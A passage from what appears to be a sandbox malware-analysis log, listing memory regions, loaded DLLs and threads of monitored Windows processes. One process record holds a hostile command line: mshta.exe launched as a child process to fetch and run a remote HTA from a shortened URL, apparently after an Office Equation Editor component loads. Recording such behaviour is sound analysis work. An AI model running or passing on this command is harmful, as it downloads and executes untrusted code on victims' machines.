end_va = 0x75e4bfff
entry_point = 0x75cf0000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 844
start_va = 0x75fa0000
end_va = 0x7603cfff
entry_point = 0x75fa0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 845
start_va = 0x760d0000
end_va = 0x761bffff
entry_point = 0x760d0000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 846
start_va = 0x76490000
end_va = 0x7652ffff
entry_point = 0x76490000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 847
start_va = 0x76720000
end_va = 0x767aefff
entry_point = 0x76720000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 848
start_va = 0x76a70000
end_va = 0x76afffff
entry_point = 0x76a70000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 849
start_va = 0x76b00000
end_va = 0x77749fff
entry_point = 0x76b00000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 850
start_va = 0x77810000
end_va = 0x77819fff
entry_point = 0x77810000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 851
start_va = 0x77820000
end_va = 0x7791ffff
entry_point = 0x77820000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 852
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 853
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 854
start_va = 0x490000
end_va = 0x617fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 855
start_va = 0x630000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 856
start_va = 0x75c00000
end_va = 0x75c5ffff
entry_point = 0x75c00000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 857
start_va = 0x75e50000
end_va = 0x75f1bfff
entry_point = 0x75e50000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 858
start_va = 0x30000
end_va = 0x30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 859
start_va = 0x1b0000
end_va = 0x1b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 860
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 861
start_va = 0x3c0000
end_va = 0x3c6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 862
start_va = 0x3d0000
end_va = 0x3d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 863
start_va = 0x640000
end_va = 0x7c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 864
start_va = 0x7d0000
end_va = 0x1bcffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 865
start_va = 0x1bd0000
end_va = 0x1e9efff
entry_point = 0x1bd0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 866
start_va = 0x1ea0000
end_va = 0x2292fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ea0000"
filename = ""
Region:
id = 867
start_va = 0x6fe20000
end_va = 0x6fe2ffff
entry_point = 0x0
region_type = private
name = "private_0x000000006fe20000"
filename = ""
Region:
id = 868
start_va = 0x75290000
end_va = 0x75292fff
entry_point = 0x75290000
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 869
start_va = 0x23d0000
end_va = 0x23dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023d0000"
filename = ""
Region:
id = 870
start_va = 0x2580000
end_va = 0x258ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 871
start_va = 0x2590000
end_va = 0x298ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 872
start_va = 0x74b10000
end_va = 0x74d4ffff
entry_point = 0x74b10000
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll")
Region:
id = 873
start_va = 0x3de20000
end_va = 0x3de2dfff
entry_point = 0x3de20000
region_type = mapped_file
name = "eeintl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\1033\\eeintl.dll")
Region:
id = 874
start_va = 0x75210000
end_va = 0x7528ffff
entry_point = 0x75210000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 875
start_va = 0x3e0000
end_va = 0x3e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 876
start_va = 0x22a0000
end_va = 0x237efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000022a0000"
filename = ""
Region:
id = 877
start_va = 0x2b10000
end_va = 0x2b4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b10000"
filename = ""
Region:
id = 878
start_va = 0x76040000
end_va = 0x760c2fff
entry_point = 0x76040000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 879
start_va = 0x2380000
end_va = 0x23bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002380000"
filename = ""
Region:
id = 880
start_va = 0x23e0000
end_va = 0x24dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023e0000"
filename = ""
Region:
id = 881
start_va = 0x24e0000
end_va = 0x251ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 882
start_va = 0x2990000
end_va = 0x2a8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002990000"
filename = ""
Region:
id = 883
start_va = 0x750e0000
end_va = 0x750f5fff
entry_point = 0x750e0000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 884
start_va = 0x7efd5000
end_va = 0x7efd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 885
start_va = 0x7efd8000
end_va = 0x7efdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 886
start_va = 0x750a0000
end_va = 0x750dafff
entry_point = 0x750a0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 887
start_va = 0x75350000
end_va = 0x7535dfff
entry_point = 0x75350000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 888
start_va = 0x2520000
end_va = 0x255ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 889
start_va = 0x2a90000
end_va = 0x2acffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a90000"
filename = ""
Region:
id = 890
start_va = 0x2b50000
end_va = 0x2c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 891
start_va = 0x2c50000
end_va = 0x2d4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c50000"
filename = ""
Region:
id = 892
start_va = 0x2d50000
end_va = 0x2dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 893
start_va = 0x2dd0000
end_va = 0x2e8ffff
entry_point = 0x2dd0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 894
start_va = 0x2f60000
end_va = 0x2f9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f60000"
filename = ""
Region:
id = 895
start_va = 0x751f0000
end_va = 0x75202fff
entry_point = 0x751f0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 896
start_va = 0x7efaa000
end_va = 0x7efacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 897
start_va = 0x7efad000
end_va = 0x7efaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Thread:
id = 68
os_tid = 0xbd8
Thread:
id = 69
os_tid = 0xbdc
Thread:
id = 70
os_tid = 0xbe0
Thread:
id = 71
os_tid = 0xbe4
Thread:
id = 72
os_tid = 0xbe8
Process:
id = "4"
image_name = "mshta.exe"
filename = "c:\\windows\\syswow64\\mshta.exe"
page_root = "0x2df43000"
os_pid = "0xbf0"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0xbd4"
cmd_line = "C:\\Windows\\SysWOW64\\mshta.exe https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC"
cur_dir = "C:\\Windows\\system32\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 898
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 899
start_va = 0x30000
end_va = 0x31fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 900
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x40000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 901
start_va = 0x1b0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 902
start_va = 0x240000
end_va = 0x33ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000240000"
filename = ""
Region:
id = 903
start_va = 0x680000
end_va = 0x68efff
entry_point = 0x680000
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")
Region:
id = 904
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 905
start_va = 0x77e20000
end_va = 0x77f9ffff
entry_point = 0x77e20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 906
start_va = 0x7efb0000
end_va = 0x7efd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 907
start_va = 0x7efdb000
end_va = 0x7efddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 908
start_va = 0x7efde000
end_va = 0x7efdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 909
start_va = 0x7efdf000
end_va = 0x7efdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 910
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 911
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 912
start_va = 0x7fff0000
end_va = 0x7fffffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 913
start_va = 0x50000
end_va = 0x53fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 914
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 915
start_va = 0x4d0000
end_va = 0x54ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 916
start_va = 0x752a0000
end_va = 0x752a7fff
entry_point = 0x752a0000
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 917
start_va = 0x752b0000
end_va = 0x7530bfff
entry_point = 0x752b0000
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 918
start_va = 0x75310000
end_va = 0x7534efff
entry_point = 0x75310000
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 919
start_va = 0x820000
end_va = 0x91ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000820000"
filename = ""
Region:
id = 920
start_va = 0x75f40000
end_va = 0x75f85fff
entry_point = 0x75f40000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 921
start_va = 0x76220000
end_va = 0x7632ffff
entry_point = 0x76220000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 922
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x0
region_type = private
name = "private_0x0000000077a20000"
filename = ""
Region:
id = 923
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000077b20000"
filename = ""
Region:
id = 924
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 925
start_va = 0x70000
end_va = 0xd6fff
entry_point = 0x70000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 926
start_va = 0x75970000
end_va = 0x7597bfff
entry_point = 0x75970000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 927
start_va = 0x75980000
end_va = 0x759dffff
entry_point = 0x75980000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 928
start_va = 0x759e0000
end_va = 0x759f8fff
entry_point = 0x759e0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 929
start_va = 0x75a10000
end_va = 0x75abbfff
entry_point = 0x75a10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 930
start_va = 0x760d0000
end_va = 0x761bffff
entry_point = 0x760d0000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 931
start_va = 0x76490000
end_va = 0x7652ffff
entry_point = 0x76490000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 932
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 933
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 934
start_va = 0xad0000
end_va = 0xadffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000ad0000"
filename = ""
Region:
id = 935
start_va = 0xe0000
end_va = 0x17ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 936
start_va = 0x74790000
end_va = 0x74d46fff
entry_point = 0x74790000
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")
Region:
id = 937
start_va = 0x75f90000
end_va = 0x75f94fff
entry_point = 0x75f90000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 938
start_va = 0x76a70000
end_va = 0x76afffff
entry_point = 0x76a70000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 939
start_va = 0x77820000
end_va = 0x7791ffff
entry_point = 0x77820000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 940
start_va = 0x77810000
end_va = 0x77819fff
entry_point = 0x77810000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 941
start_va = 0x75fa0000
end_va = 0x7603cfff
entry_point = 0x75fa0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 942
start_va = 0x75cf0000
end_va = 0x75e4bfff
entry_point = 0x75cf0000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 943
start_va = 0x75ac0000
end_va = 0x75bf5fff
entry_point = 0x75ac0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 944
start_va = 0x77920000
end_va = 0x77a14fff
entry_point = 0x77920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 945
start_va = 0x75c60000
end_va = 0x75cb6fff
entry_point = 0x75c60000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 946
start_va = 0x767e0000
end_va = 0x769dafff
entry_point = 0x767e0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 947
start_va = 0x76720000
end_va = 0x767aefff
entry_point = 0x76720000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 948
start_va = 0x76330000
end_va = 0x7644cfff
entry_point = 0x76330000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 949
start_va = 0x77800000
end_va = 0x7780bfff
entry_point = 0x77800000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 950
start_va = 0x75070000
end_va = 0x75099fff
entry_point = 0x75070000
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll")
Region:
id = 951
start_va = 0x75060000
end_va = 0x75068fff
entry_point = 0x75060000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 952
start_va = 0x20000
end_va = 0x3dfff
entry_point = 0x20000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 953
start_va = 0x340000
end_va = 0x4c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 954
start_va = 0x20000
end_va = 0x3dfff
entry_point = 0x20000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 955
start_va = 0x75c00000
end_va = 0x75c5ffff
entry_point = 0x75c00000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 956
start_va = 0x75e50000
end_va = 0x75f1bfff
entry_point = 0x75e50000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 957
start_va = 0x690000
end_va = 0x810fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Region:
id = 958
start_va = 0xae0000
end_va = 0x1edffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ae0000"
filename = ""
Region:
id = 959
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 960
start_va = 0x30000
end_va = 0x31fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 961
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0xe0000
region_type = mapped_file
name = "mshta.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui")
Region:
id = 962
start_va = 0x170000
end_va = 0x17ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 963
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 964
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 965
start_va = 0x950000
end_va = 0x98ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000950000"
filename = ""
Region:
id = 966
start_va = 0x2030000
end_va = 0x212ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002030000"
filename = ""
Region:
id = 967
start_va = 0x75030000
end_va = 0x75050fff
entry_point = 0x75030000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 968
start_va = 0x7efd8000
end_va = 0x7efdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 969
start_va = 0x76530000
end_va = 0x76574fff
entry_point = 0x76530000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 970
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 971
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 972
start_va = 0x75210000
end_va = 0x7528ffff
entry_point = 0x75210000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 973
start_va = 0x130000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 974
start_va = 0x550000
end_va = 0x62efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 975
start_va = 0x751f0000
end_va = 0x75202fff
entry_point = 0x751f0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 976
start_va = 0x2130000
end_va = 0x23fefff
entry_point = 0x2130000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 977
start_va = 0x2400000
end_va = 0x2742fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002400000"
filename = ""
Region:
id = 978
start_va = 0x76b00000
end_va = 0x77749fff
entry_point = 0x76b00000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 979
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 980
start_va = 0x75950000
end_va = 0x7595afff
entry_point = 0x75950000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 981
start_va = 0x190000
end_va = 0x19bfff
entry_point = 0x190000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 982
start_va = 0x1a0000
end_va = 0x1a7fff
entry_point = 0x1a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 983
start_va = 0x1f0000
end_va = 0x1fffff
entry_point = 0x1f0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 984
start_va = 0x200000
end_va = 0x23ffff
entry_point = 0x200000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")
Region:
id = 985
start_va = 0x630000
end_va = 0x630fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000630000"
filename = ""
Region:
id = 986
start_va = 0x76040000
end_va = 0x760c2fff
entry_point = 0x76040000
